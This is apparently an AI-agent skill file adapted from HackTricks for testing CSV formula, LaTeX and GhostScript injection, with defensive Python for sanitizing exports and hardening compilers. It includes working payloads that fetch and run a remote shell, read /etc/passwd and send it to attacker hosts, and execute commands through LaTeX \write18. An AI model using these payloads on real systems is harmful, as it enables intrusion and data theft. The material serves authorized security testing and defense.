Hacktricks-skills formula-latex-ghostscript-injection

Security testing skill for Formula/CSV Injection, LaTeX Injection, and GhostScript Injection vulnerabilities. Use this skill whenever you need to test for spreadsheet formula injection (CSV/Excel), LaTeX document injection, or GhostScript PDF processing injection. Trigger this skill when analyzing file upload endpoints, document generation features, CSV export functionality, or any system that processes user input into spreadsheet formulas, LaTeX documents, or PDF files. This skill helps identify injection vectors, generate test payloads, and understand exploitation techniques for authorized security assessments.

install

source: clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/formula-csv-doc-latex-ghostscript-injection/SKILL.MD

source content

Formula/CSV/LaTeX/GhostScript Injection Testing

A comprehensive skill for testing injection vulnerabilities in spreadsheet formulas, LaTeX documents, and GhostScript PDF processing.

When to Use This Skill

Use this skill when:

  • Testing CSV export functionality for formula injection
  • Analyzing document generation features that use LaTeX
  • Assessing PDF processing pipelines using GhostScript
  • Reviewing file upload endpoints that process spreadsheets or documents
  • Investigating data exfiltration risks through spreadsheet formulas
  • Testing for Remote Code Execution (RCE) via document processing

Safety Notice

⚠️ Authorized Testing Only: These techniques should only be used in authorized security assessments. Never test systems you don't own or have explicit permission to assess.


Formula/CSV Injection

Understanding the Vulnerability

When user input is reflected inside CSV files that will be opened by Excel or similar spreadsheet applications, attackers can inject formulas that execute when the file is opened.

Detection Methodology

  1. Identify CSV export endpoints - Look for download links, export buttons, or API endpoints returning CSV data
  2. Test with formula prefixes - Submit inputs starting with =, +, -, @, or a tab character
  3. Check for DDE payloads - Test Dynamic Data Exchange injection vectors
  4. Verify Excel warnings - Note that modern Excel shows warnings for external content

Test Payloads

Basic Formula Injection

=10+20
=SUM(1+9)
=cmd|' /C calc'!A0

DDE Payloads (Remote Code Execution)

DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

Hyperlink Injection (Data Exfiltration)

=HYPERLINK("http://attacker.com/exfil?data=","Click here")
=HYPERLINK("http://attacker.com/"&A1,"Link")

LibreOffice Calc Exploitation

LibreOffice can read local files and exfiltrate data:

='file:///etc/passwd'#$passwd.A1
=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)))
=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<attacker domain>"))

Google Sheets OOB Exfiltration

=IMPORTXML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
=IMPORTFEED(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)))
=IMPORTHTML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
=IMAGE("https://<attacker IP:Port>/images/test.png")

LaTeX Injection

Understanding the Vulnerability

LaTeX injection occurs when user input is processed by LaTeX compilers (pdflatex, xelatex, etc.) without proper sanitization. The severity depends on shell escape settings.

Shell Escape Modes

Mode                 Description                      Risk
--no-shell-escape    Disables \write18{}              Low
--shell-restricted   Limited set of safe commands     Medium
--shell-escape       Full command execution           Critical

Detection Methodology

  1. Identify LaTeX processing - Look for PDF generation, document compilation, or LaTeX rendering
  2. Test with LaTeX commands - Submit inputs containing \input, \write18, or \include
  3. Check error messages - LaTeX errors can reveal processing details
  4. Test file operations - Attempt to read/write files via LaTeX

File Read Payloads

\input{/etc/passwd}
\include{password}
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}

Read Single Line File

\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file

Read Multi-line File

\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
    \read\file to\fileline
    \text{\fileline}
\repeat
\closein\file

File Write Payloads

\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile

Command Execution Payloads

\immediate\write18{env > output}
\input{output}

\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}

\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}

Alternative Commands (when mpost restricted)

\input{|"bibtex8 --version > /tmp/b.tex"}
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}

Base64 Encoding (for special characters)

\immediate\write18{env | base64 > test.tex}
\input{test.tex}

Cross-Site Scripting via LaTeX

\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}

GhostScript Injection

Understanding the Vulnerability

GhostScript is a PDF interpreter that can execute arbitrary code if user input is not properly sanitized. It is common in PDF processing, conversion, and rendering pipelines.

Detection Methodology

  1. Identify GhostScript usage - Look for PDF processing, conversion tools, or image extraction
  2. Test with GhostScript operators - Submit inputs containing system() or exec()
  3. Check version - Older versions have more vulnerabilities
  4. Test file operations - Attempt to read/write files

Common Attack Vectors

  • PDF metadata injection
  • JavaScript execution in PDFs
  • External file inclusion
  • Command execution via GhostScript operators


Testing Workflow

Step 1: Reconnaissance

  1. Identify all file processing endpoints
  2. Determine file types accepted (CSV, LaTeX, PDF)
  3. Map data flow from input to output
  4. Check for sanitization or validation

Step 2: Payload Testing

  1. Start with benign payloads to confirm processing
  2. Escalate to file read operations
  3. Test command execution if file operations work
  4. Attempt data exfiltration via OOB channels

Step 3: Verification

  1. Check for command execution indicators
  2. Monitor network traffic for exfiltration
  3. Verify file creation/modification
  4. Document all findings

Step 4: Reporting

  1. Include proof-of-concept payloads
  2. Explain impact and risk
  3. Provide remediation recommendations
  4. Note affected endpoints and parameters

Remediation Recommendations

Formula/CSV Injection

  • Escape formula characters - Prefix cells with a single quote (')
  • Use non-Excel formats - Consider JSON, XML, or plain text
  • Validate input - Reject inputs starting with =, +, -, or @
  • Add warnings - Include security notices in exported files
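The following Python is an added defensive example, not part of the skill or its bundled scripts. It implements the formula-prefix check from step 2 of the CSV Detection Methodology above and the escaping/validation recommendations in this list: every cell that starts with a formula trigger is prefixed with a single quote before it is written, and every cell is quoted so a stray delimiter cannot start a new cell. The function names and the sample rows are constructed for the example; treating leading CR/LF as triggers is an added assumption beyond the characters the skill lists.

```python
import csv
import io

# Leading characters that make Excel, LibreOffice Calc or Google Sheets parse a
# cell as a formula. The skill lists = + - @ and tab; CR and LF are added here
# as a defensive assumption so a multi-line cell cannot smuggle a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")


def is_formula_like(value):
    """Detection helper: True if a spreadsheet would evaluate this cell."""
    return str(value).startswith(FORMULA_TRIGGERS)


def sanitize_cell(value):
    """Neutralise a cell that would otherwise be interpreted as a formula.

    Genuine numbers are emitted unchanged (a negative number must keep its
    leading '-'), so only string fields are ever prefixed. Strings that start
    with a trigger get the single-quote prefix recommended above, which makes
    the spreadsheet treat the cell as literal text.
    """
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_csv(rows):
    """Render rows as CSV text with every cell sanitised and double-quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([sanitize_cell(cell) for cell in row])
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample export: the second row carries a payload from the
    # lists above inside an otherwise ordinary "comment" column.
    sample_rows = [
        ["user", "balance", "comment"],
        ["alice", -5, "=cmd|' /C calc'!A0"],
        ["bob", 12, "plain text comment"],
    ]
    print(export_csv(sample_rows))
```

Apply the sanitiser at the export boundary, not at input time, so the stored data stays intact and every export path is covered. The quote prefix is the common mitigation but not a complete one: the safest option in the list remains exporting a format that no spreadsheet will auto-evaluate.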

LaTeX Injection

  • Use --no-shell-escape - Disable shell escape by default
  • Sanitize input - Remove or escape LaTeX commands
  • Use restricted mode - --shell-restricted if commands are needed
  • Sandbox processing - Run LaTeX in isolated environments
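As an added example that is not part of the skill or its bundled scripts, the Python below covers two of the LaTeX recommendations above plus step 2 of the LaTeX Detection Methodology: scan_latex flags the control sequences from the payload lists (\write18, piped and plain \input, \include, \lstinputlisting, \verbatiminput, \openin, \openout and javascript: links), escape_user_text neutralises user-supplied text before it is interpolated into a template, and hardened_compile_argv builds a pdflatex command line with shell escape disabled. Function names and patterns are constructed for this example; the pdflatex flags used are real options.

```python
import re

# Control sequences from the payload lists above. Note that the file read and
# write primitives (\openin, \openout, \input{file}) do not need shell escape,
# so disabling \write18 alone does not stop them; scan and escape as well.
DANGEROUS_PATTERNS = [
    (r"\\write18\b", "shell escape (\\write18)"),
    (r"\\input\s*\{\s*\|", "piped command via \\input{|...}"),
    (r"\\input\s*\{", "file inclusion via \\input"),
    (r"\\include\s*\{", "file inclusion via \\include"),
    (r"\\lstinputlisting\b", "file read via \\lstinputlisting"),
    (r"\\verbatiminput\b", "file read via \\verbatiminput"),
    (r"\\openin\b", "file read via \\openin"),
    (r"\\openout\b", "file write via \\openout"),
    (r"\\(?:url|href)\s*\{\s*javascript:", "javascript: link (XSS)"),
]
_COMPILED = [(re.compile(p, re.IGNORECASE), why) for p, why in DANGEROUS_PATTERNS]


def scan_latex(source):
    """Return (line_number, reason, matched_text) for each dangerous sequence."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for pattern, why in _COMPILED:
            match = pattern.search(line)
            if match:
                findings.append((lineno, why, match.group(0)))
    return findings


# Characters that are special to TeX, mapped to their literal-text forms.
# The backslash is replaced first (single pass), so no escape is escaped twice.
_ESCAPES = {
    "\\": r"\textbackslash{}",
    "{": r"\{",
    "}": r"\}",
    "$": r"\$",
    "&": r"\&",
    "#": r"\#",
    "_": r"\_",
    "%": r"\%",
    "~": r"\textasciitilde{}",
    "^": r"\textasciicircum{}",
}
_ESCAPE_RE = re.compile("|".join(re.escape(c) for c in _ESCAPES))


def escape_user_text(text):
    """Escape user text so it renders literally inside a trusted template."""
    return _ESCAPE_RE.sub(lambda m: _ESCAPES[m.group(0)], text)


def hardened_compile_argv(tex_path, output_dir):
    """pdflatex command line with shell escape disabled and no interactive
    prompt, suitable for running inside a sandbox with a timeout."""
    return [
        "pdflatex",
        "--no-shell-escape",          # never allow \write18
        "-interaction=nonstopmode",   # never wait for terminal input
        "-halt-on-error",             # fail fast instead of producing partial output
        f"-output-directory={output_dir}",
        tex_path,
    ]


if __name__ == "__main__":
    # Constructed sample: a document with a payload from the lists above.
    sample = "\\documentclass{article}\n\\immediate\\write18{env > output}\n\\input{output}"
    for lineno, why, text in scan_latex(sample):
        print(f"line {lineno}: {why}: {text}")
    print(escape_user_text("Total: 100% & more_text"))
    print(" ".join(hardened_compile_argv("doc.tex", "/tmp/out")))
```

The scanner is a detection aid for review and logging, not a substitute for escaping: only the escape step guarantees that user text cannot form a control sequence, and only the compiler flag (with a sandbox around it) limits what a command that slips through can do.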

GhostScript Injection

  • Update GhostScript - Keep to the latest version
  • Disable dangerous operators - Use -dSAFER mode
  • Validate input - Sanitize all user-provided content
  • Sandbox processing - Use containerization or VMs
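An added Python example, not part of the skill, for the first two GhostScript recommendations above and step 3 of the GhostScript Detection Methodology: it parses the installed version, reports whether -dSAFER is already the default (it has been since Ghostscript 9.50), and builds a rasterisation command line that passes -dSAFER explicitly anyway so behaviour does not depend on the installed build. The -dSAFER, -dBATCH, -dNOPAUSE, -dQUIET, -r, -sDEVICE and -sOutputFile options are real Ghostscript options; the function names and sample version strings are constructed for this example.

```python
import re
import shutil
import subprocess

# Ghostscript made -dSAFER the default in 9.50; anything older must be upgraded
# per the remediation list, and must at least be given the flag explicitly.
SAFER_DEFAULT_SINCE = (9, 50)


def parse_gs_version(text):
    """Parse the first X.Y[.Z] token from `gs --version` or `gs -v` output."""
    match = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not match:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(g) for g in match.groups() if g is not None)


def safer_is_default(version):
    """True if this release already applies -dSAFER without being asked."""
    return tuple(version[:2]) >= SAFER_DEFAULT_SINCE


def installed_gs_version():
    """Return the installed version tuple, or None if gs is not on PATH."""
    gs = shutil.which("gs")
    if gs is None:
        return None
    out = subprocess.run([gs, "--version"], capture_output=True, text=True,
                         timeout=10, check=False).stdout
    return parse_gs_version(out)


def build_gs_argv(input_path, output_pattern, device="png16m", dpi=150):
    """Hardened argv for rendering an untrusted PDF/PostScript file to images.

    input_path should be an absolute path so it cannot be mistaken for an
    option; run the result inside a container or VM with a timeout.
    """
    return [
        "gs",
        "-dSAFER",                  # restrict file access even on old builds
        "-dBATCH", "-dNOPAUSE",     # exit when finished, never prompt
        "-dQUIET",
        f"-r{dpi}",
        f"-sDEVICE={device}",
        f"-sOutputFile={output_pattern}",
        input_path,
    ]


if __name__ == "__main__":
    version = installed_gs_version()
    if version is None:
        print("gs not installed; showing the command line only")
    else:
        print("installed:", ".".join(map(str, version)),
              "SAFER default:", safer_is_default(version))
    print(" ".join(build_gs_argv("/tmp/untrusted.pdf", "/tmp/page-%03d.png")))
```

A version below 9.50 is itself a finding to report under the Update GhostScript item, independently of whether the flag is passed.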

Helper Scripts

Use the bundled scripts to generate test payloads:

  • scripts/generate_csv_payloads.py - Generate CSV injection payloads
  • scripts/generate_latex_payloads.py - Generate LaTeX injection payloads
  • scripts/test_injection.py - Test for injection vulnerabilities

Run scripts with --help for usage information.
